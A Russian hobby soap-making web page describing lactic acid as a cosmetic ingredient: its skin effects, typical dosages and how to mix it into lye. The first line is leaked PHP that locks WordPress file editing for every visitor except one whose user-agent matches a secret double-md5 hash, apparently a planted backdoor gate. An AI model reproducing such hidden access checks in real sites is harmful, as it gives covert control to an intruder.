if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Молочная кислота | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Молочная кислота

Молочная кислота – ингредиент, стимулирующий регенерацию и восстановление кожи. Применяется для изготовления кремов, лосьонов, средств для интимной гигиены

Ингредиенты для мыла - Молочная кислота Ингредиенты для мыла - Молочная кислота

Молоч­ная кис­ло­та – ингре­ди­ент, сти­му­ли­ру­ю­щий реге­не­ра­цию и вос­ста­нов­ле­ние кожи.

При­ме­ня­ет­ся для изго­тов­ле­ния кре­мов, лосьо­нов, средств для интим­ной гиги­е­ны. Это бес­цвет­ная жид­кость блед­но-жел­то­го цве­та. Име­ет сла­бо выра­жен­ный спе­ци­фи­че­ский запах.

Свой­ства
Поми­мо реге­не­ри­ру­ю­щих свойств, обла­да­ет отбе­ли­ва­ю­щи­ми и увлаж­ня­ю­щи­ми свой­ства­ми. Нор­ма­ли­зу­ет про­цесс обнов­ле­ния кле­ток верх­не­го слоя кожи, кото­рый с воз­рас­том замед­ля­ет­ся. При­да­ет коже эла­стич­ность. Сохра­ня­ет вла­гу. Очи­ща­ет кожу, сужа­ет поры. Нор­ма­ли­зу­ют липид­ный обмен. Уси­ли­ва­ет обра­зо­ва­ние в коже кол­ла­ге­на и гли­ко­за­ми­но­гли­ка­нов. Тони­зи­ру­ет кожу. Под­хо­дит для жир­ной кожи, может исполь­зо­вать­ся для лече­ния акне. Име­ет освет­ля­ю­щее дей­ствие, хоро­шо борет­ся с пиг­мент­ны­ми пят­на­ми. Уда­ля­ет запах пота. Нор­ма­ли­зу­ет уро­вень pH кожи. Молоч­ная кис­ло­та ока­зы­ва­ет омо­ла­жи­ва­ю­щее действие.

При­ме­не­ние
Добав­ля­ет­ся в раз­лич­ные типы кос­ме­ти­че­ской про­дук­ции – 0,1%, в сред­ствах для пилин­га ее доля может дости­гать 3–4%. Поми­мо это­го, при­ме­ня­ет­ся в фар­ма­ко­ло­ги­че­ской про­мыш­лен­но­сти и пище­вой про­мыш­лен­но­сти. Для изго­тов­ле­ния кос­ме­ти­че­ских средств, молоч­ная кис­ло­та вво­дит­ся на эта­пе при­го­тов­ле­ния щелоч­но­го рас­тво­ра. При этом кис­ло­та сна­ча­ла раз­ме­ши­ва­ет­ся с водой, а затем добав­ля­ет­ся в щелочь.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!